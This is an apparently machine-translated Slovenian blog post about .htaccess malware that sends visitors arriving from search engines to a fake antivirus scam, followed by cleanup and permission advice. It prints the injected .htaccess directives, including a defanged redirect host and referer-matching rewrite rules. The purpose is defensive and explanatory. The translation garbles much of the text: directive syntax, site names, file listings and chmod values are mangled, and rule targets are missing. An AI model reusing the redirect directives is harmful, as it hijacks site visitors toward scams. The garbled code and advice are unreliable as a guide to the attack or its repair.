Malware / Virus - .htaccess "reportaža" in preusmeritev

Nova oblika virusa kar vidim jaz ne vem veliko, vpliva na straneh gostuje na nezanesljivih strežnikov kjer lahko uporabniki računovodskih izkazov / podračunov "videti" med seboj. Natančneje, gostovanje računov vse dal v mapo "vhosts"Pisanje in pravica Mapa uporabnik so "vhosts" je podan splošni uporabniško ... Reseller v večini primerov. To je tipična spletnih strežnikov, ki ne uporabljajo WHM / cPanel.

.Htaccess - .htaccess Hack ukrepanje

Virus vplivajo datotek .htaccess Stran žrtve. Dodal sem linij / Direktiva za preusmeriti obiskovalce (Prihajam iz Yahoo, MSN, Google, Facebook, yaindex, Twitter, MySpace, itd spletnih strani in portalov z veliko prometa) do nekaterih spletnih strani, ki ponujajo "Protivirusni. "To je ponaredek protivirusni, Kar sem zapisal v uvodu k .

Tukaj je tisto, kar je videti kot .htaccess vpliva: (ne dostopa do vsebin spletnih naslovov v naslednjih vrsticah)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * VKontakte. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Živo. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Obvezna. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Scene. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Wordpress. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * AltaVista. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * HotBot. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Pojdi. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * AlltheWeb. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Iskanje. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * MetaCrawler. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, ALI]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. * Windows *.
RewriteRule. * [R, L]

RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond% {REQUEST_FILENAME} * Jpg $ |!.. * GIF $ |. * PNG $
RewriteCond% {HTTP_USER_AGENT}. * Windows *.
RewriteRule. * [R, L]

Tisti, ki uporabljajo WordPress bodo našli teh vrstic v datoteki .htaccess iz public_html. Poleg tega je virus ustvari. Identičen htaccess v mapi wp-content.

*Obstajajo tudi primeri, v katerih namesto pride peoriavascularsurgery.com dns.thesoulfoodcafe.com ali druge naslove.

Kaj naredi ta virus.

Ko preusmerjen, je obiskovalec pozdravili z odprtimi rokami, s sporočilom:

Opozorilo!
Vaš računalnik vsebuje različne znake virusov in zlonamerne programe prisotnost. Vaš takojšnja zahteva preverjanje anti virus sistem!
Varnostni sistem bo opravil hitro in brezplačno skeniranje računalnika za virusi in zlonamernimi programi.

1 malware

Ni važno, kateri se pritisne gumb, smo preusmerjeni na stran "Moj računalnik"Ustvaril da posnemajo Oblikovanje XP. Ta se samodejno zažene "skeniranje", na koncu katerega smo ugotovili, da "okužen".

2 malware

Ko kliknete OK ali Cancel, se bo začela prenesiDatoteka je setup.exe. To setup.exe je ponaredek anti virus vpliva na sistem. Namestite nekaj malware propagirajo nadaljnje povezave virus, in poleg teh protivirusno programsko opremo (vse napačne), da je žrtev povabljena k nakupu.
Tisti, ki so že stopili v stik z virusom, lahko uporabite ta obrazec . Priporočljivo je tudi, da skeniranje celotnega HDD. Priporočamo Kaspersky Internet Security ali Kaspersky Anti-Virus.

Ta tip virusa prizadene Visitor operacijske sisteme OS Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 in Windows 95. Zaenkrat ni znanih primerov okužbe iz operacijskih sistemov Windows Vista in Windows 7.

Kako je mogoče odstraniti ta virus. Htaccess na strežniku, in kako preprečiti okužbo.

1. Analizira sumljive datoteke in brisanje kod. Da bi zagotovili, da se datoteka ne samo vpliva .htaccess Bolje je analizirati vse datoteke . PHP si . Js.

2. Reportaža datoteko. Htaccess in sem iz chmod 644 ali 744 z dostopom pisanja samo uporabnik lastnik.

3. Ko ustvarite račun gostovanje za spletno stran v mapo / Domov ali / Webroot To bo samodejno ustvari mapo, ki ima pogosto uporabniškega imena (Uporabnik za cpanel, ftp, Itd). Da bi preprečili pisanje podatkov in prenosa virusov iz enega uporabnika na drugega, je priporočljivo, da za vsako mapo uporabnik določi:

chmod ali 644 744, 755 - prikazano je 644.
chown-R nume_user nume_folder.
CHGRP-R nume_user nume_folder

ls-all načinov za preverjanje, če so pravilno izvedena. , Bi morale biti nekako takole:

drwx-x-x dinamika dinamike 12 4096 maj 6 14: dinamika 51 /
drwx-x-x 10 duran duran 4096 Mar 7 07: 46 duran /
drwx-x-x 12 Tube Test Tube 4096 Jan 29 11: 23 Tube /
drwxr-xr-x 14 Express 4096 feb 26 2009 hitri /
drwxr-xr-x 9 ezo ezo 4096 maj 19 01: 09 ezo /
drwx-x-x kmetija 9 kmetija 4096 19 22: kmetija 29 /

Če bo eden od zgoraj, userele FTP Okužene datotekeNe more poslati virus na druge uporabnike gostitelja. To je minimalna varnostna mreža za zaščito računov gostuje na spletni strežnik.

Skupni elementi področjih, ki jih ta tip virusa.

Vse območjem preusmeriti obiskovalce na strani z domeno, ki vsebujejo "/".

Ta "virus. htaccess"Vpliva na vse vrste CMS (Joomla, WordPress, phpBBItd), ki uporablja .htaccess.

. Htaccess Preusmeritev Virus Hack &.

Malware / Virus - .htaccess "reportaža" in preusmeritev

O avtorju

Stealth LP

Ustanovitelj in urednik Stealth NastavitveV dnevu 2006.
Izkušnje na operacijskih sistemih Linux (zlasti CentOS), Mac OS X, Windows XP, Windows> 10 in WordPress (CMS).

Pustite komentar